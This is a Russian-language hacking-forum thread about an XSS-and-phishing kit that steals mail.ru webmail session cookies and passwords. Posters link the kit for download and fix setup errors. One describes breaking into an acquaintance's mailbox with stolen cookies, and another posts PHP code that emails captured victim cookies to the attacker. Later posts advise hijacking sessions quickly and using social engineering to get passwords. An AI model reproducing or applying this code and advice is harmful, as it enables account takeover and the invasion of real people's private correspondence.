mail.ru: XSS + фейк (2 в 1)

Фейк твой ни при чем, просто запостил в тему, где упоминалась mail.ru (мож кому пригодится). Звиняй, если что не так
П.С. - если захочешь, то снесу ...

 

плз дайте рабочий линк!!!!

 

http://rapidshare.com/files/174280184/mail.ru_sniff_fake.rar.html - рабочий вполне

 

А чё XSS ещё живая О_о
DIMON4G, ппц, это защита от школьников, убери пост

 

нет, не работает

 

У меня на снифф приходят только данные с фейка

 

Все?? похоже прикрыли?

 

неннаю ,посмотрел видео но вот насчет Vmware я нечего непонял ,гугил чтоб понять как её поставить но нечего непонял ,но всё равно молодец !! ЗАчет

пишет ошибку Parse error: syntax error, unexpected T_STRING in /home/a6256423/public_html/mail/mail-sniffer.php on line 7
когда вводишь пароль и наживаешь войти

 

Вообще-то устанавливать виртуальную машину вовсе не обязательно, что бы проверить, работает ли всё.

В этой строчке защита от школьников.

А вот у меня вопрос такой: Как задать разрешение не запись? Или посоветуйте хост, где можно так сделать. И вообще на видео у чела "домашний" Apache сервак. Так как быть?

А! Всё, ребят, не надо. Сам допер. И кукисы и с фейка приходит! +5 Ponchik'у )))

 

С чем связано, один отчет пришел с куками которые не ставят пароль при обновлении странички.. другой отчет все хорошо... и логин и пароль???

 

Ты наверно забыл удалить все остальные куки от mail.ru, у меня всё работает. Это насчет первого. А насчет другого отчета - ПОБЕДА!!!
Ставь + Ponchick'у!
Только 1 '-' в том, что жертва обязана обязательно открыть фото прямо из браузера

 

хех, после видео допёрло как работает данный фейк))) гг)

Хм, а ваще зачётная вещь!
Только пашед на ИЕ, в опере не кушает + письмо не удаляется...
--------------------
прошёл тест на знакомой, на фейк не повелась, но через куки вошёл в её мыло... вопрос терь в другом, сменить пасс или изменить данные для восстановления низя, нужен пасс... как его раздобыть?
возможно ли методом "сохранить пароль" фишкой оперы, а потом из файлов оперы вытянуть его? прога у меня есть... только не могу потестить, я отключил запоминалку паролей для мыла.ру (((

 

to Ponchik , спасибо с меня ++ ))
А возможно сделать что-б работала тема и на мозилу? а то просит скачать сцуко (

 

добавил "оповещение на мыло", когда жертва прошла сниффер, на мыло придут куки... каму над:
в mail-sniffer.php, в куске работы снифера (до "}else{") вставляем код и меняем мыла на свои:

Code:

$from = "[email protected]"; // от кого письмо
$to = "[email protected]"; // кому присылаем данные

$subj = " Куки"; // тема письма
$body = " Cookie: $cookie"; // тело письма

$from="From: $from\nReply-To: $from\nX-Priority: 1\nContent-Type: text/plain; charset=\"koi8-r\"\nContent-Transfer-Encoding: 8bit"; 
$from=convert_cyr_string($from,"w","k"); 
$to=convert_cyr_string($to,"w","k"); 
$subj=convert_cyr_string($subj,"w","k"); 
$body=convert_cyr_string($body,"w","k"); 
mail($to,$subj,$body,$from);

 

что за ерунда может быть, обычно нормальные куки, все заходит под ними, а щас какаято ерунда:

и не заходит под ними.. :/ меня смущает минус в конце.. в чем дело?

 

возможно в минусе дело... никогда минуса не видел, хз

 

вот вопрос тоже на счёт куков... в строке с Mpop есть следующее:

Code:

geo_city_id=xxxx;

где можно расшифровать город? гуглил, ничего не нашёл...

 

Итак, может я и новичок, но последнюю неделю я в этом деле очень поднялся.

C минусом мне тоже приходило, все работает. Другое дело, что вам приходит не зашифрованный пароль, а некий хеш сессии. А она не долговечна (У mail.ru около часа). Так что их надо подставлять вовремя, а потом "система запоминания паролей" + СИ вам в помощь. Далее для ПЕТРА и остальных: функция mail(); проста, но работает в основном только на платных серваках, иначе самому надо размещать и настраивать sendmail а это не приведи господь...

Ждите новый топик, в котором я выложу очень неплохой вариант, где будет реализована моя система оповещения+удобный интерфейс обработки логов.

 

ну эт да, я на платнике сижу (ресселер), пока живой))

а можно про это поподробнее? типа как пасс узнать? вроде мне отвечали что в куках физически его нет (мне не понятно почему тогда заходит)
ща например весь день захожу на мыло под куками, а вот пасс не наю =\

своим оповещение доволен... а вот на счёт логов... приходиться сразу лезть через ftp и смареть... хорошо бы на сам деле сделать удобный просмотр!

 

Там такая вроде такая фишка: когда жертва вводит логин и пасс, mail.ru открывает сессию и единственная "проверка на вшивость" хеш из Mpop. Когда же мы подставляем куки, он при обновлении страницы выводит нам логин и пасс(звездачками), думая, что мы - жертва. Opera пароль вроде сохраняет (по крайней мере у меня).А именно узнать сам пароль наверно проще всего с помощью СИ: пароли на форумах, ВКОНТАКТЕ, и т.д.

А про мой скрипт - к 3 часам ночи допишу)))